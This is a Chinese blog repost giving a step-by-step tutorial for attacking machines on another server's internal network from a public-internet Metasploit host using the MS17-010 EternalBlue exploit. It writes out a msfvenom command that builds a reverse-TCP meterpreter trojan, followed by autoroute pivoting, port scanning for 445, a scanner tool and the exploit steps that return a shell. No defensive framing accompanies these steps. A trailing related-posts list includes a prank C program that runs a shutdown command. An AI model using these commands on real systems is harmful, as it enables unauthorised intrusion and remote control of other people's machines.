利用公网Msf+MS17010跨网段攻击内网(不详细立马关站)「建议收藏」

利用公网Msf+MS17010跨网段攻击内网(不详细立马关站)「建议收藏」前言其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2–>192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。准备工作1.安装了Msf的公网主机+Ubuntu系统2.一台其他服务器内网存在445漏洞3.细心,细心,细心,钻研,钻研!!!…

大家好,又见面了,我是你们的朋友全栈君。

前言

其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2–>192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。

 

准备工作

1.安装了Msf的公网主机+Ubuntu系统

2.一台其他服务器内网存在445漏洞

3.细心,细心,细心,钻研,钻研!!!

 

开始第一步:公网主机操作

生成msf木马:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=6666 -f exe > /var/www/html/6666.exe

Msf监听端口:6666

 

 

可以看到,图中获取到了shell!

 

添加路由

 

第一步:run get_local_subnets (获取当前路由)

 

 

第二步:run autoroute -s 192.168.3.0/24 (添加路由)

 

 

第三步:run autoroute -p (查看已添加路由)

 

 

使用Payload进行攻击

 

第一步:background(转换到后台)

 

 

第二步:use scanner/portscan/tcp (先扫描开放445端口的PC)

 

 

第三步:exploit(开始扫描)

 

注意:扫描出来开放了445端口的PC,不一定就存在445漏洞。(如何精准定位?)

如何列出那些存在445漏洞的PC?

 

MS_17_010_Scan.ziphttps://bbs.ichunqiu.com/thread-40308-1-1.html

 

 

描述:

工具的使用步骤如下:
解压后在命令行下执行MS_17_010_Scan.exe,支持-ip 和-file两种参数。
-ip参数可以指定IP扫描,同时支持IP段扫描:
MS_17_010_Scan.exe -ip 192.168.44.129
MS_17_010_Scan.exe -ip 192.168.44.129 192.168.44.133
-file参数支持从文件读取IP列表进行扫描:
MS_17_010_Scan.exe -file ip.txt
工具将显示检测结果:如不存在风险将显示NOT Found Vuln,如存在风险将显示Found Vuln MS17-010及目标电脑的操作系统版本,如果IP地址无效或者漏洞端口未开则显示Exception。
输出结果同时保存在当前目录的result.txt中。
 

上面的工具也可以在webshell中使用,只需要把结果输出到 txt文档中即可。(例如:MS_17_010_Scan.exe -ip 192.168.44.129 >>jieguo.txt)

 

攻击正式开始

 

第一步:use exploit/windows/smb/ms17_010_eternalblue(切换到攻击模块)

第二步:set rhost 192.168.3.38(设置存在445漏洞的PC电脑IP)

第三步:exploit(执行攻击)

第四步:攻击完成,并且自动返回一个shell控制台

 

 

 

 
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/138607.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • scrapy爬虫,爬取图片

    scrapy爬虫,爬取图片

    2021年11月19日
  • 扫码登录的原理和实现方法_扫码支付的原理

    扫码登录的原理和实现方法_扫码支付的原理1概述在日常Web端产品的使用中,一般都会支持扫码登录,这种方式操作简单,相对传统的手机号登录等方式速度更快、安全性更高,还可以增加自家产品的粘合度。2登录原理扫码登录本质是解决将APP端的用户登录信息(通常是Token)通过扫码的形式安全稳定地同步给Web端。1)用户打开Web端网页,进入扫码登录的界面;2)从Web端服务器获取二维码的图并获取其状态;3)Web端服务器在生成二维码时,会生成一个uuid和二维码进行关联,并将uuid存入db记录中;4)

    2022年10月24日
  • 数组的前缀和及查分数组

    数组的前缀和及查分数组1,前缀和主要适用场景是原始数组不会被修改的情况下,频繁查询某个区间的累加和。这里就不写前缀和的代码了,就是用一个数组记录下原有数组的前缀和。比如,prefix[i]就代表着nums[0…i-1]所有元素的累加和,如果我们想求区间nums[i…j]的累加和,只要计算prefix[j+1]-prefix[i]即可,而不需要遍历整个区间求和。(需要注意的是使用场景是频繁查询某个区间的累加和,而不需要对原始数组进行频繁修改)2,查分数组的主要适用场景是**频繁对原始数组的某个区间的元素进行增减。**比

  • C语言之一个有趣的关机程序「建议收藏」

    C语言之一个有趣的关机程序「建议收藏」★一个有趣的关机程序#include<stdio.h>intmain(){charinput[]={0};system("shutdown-s-t60")//这是Windows系统下的一个关机命令flag:printf("你的电脑将在一分钟后关机,如果输入"我是猪",就会取消关机!\n请输入:");scanf("%s",input);if(0==strcm…

  • 【Lucene4.8教程之四】分析

    【Lucene4.8教程之四】分析

  • HDU 3699 A hard Aoshu Problem (暴力搜索)[通俗易懂]

    HDU 3699 A hard Aoshu Problem (暴力搜索)

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号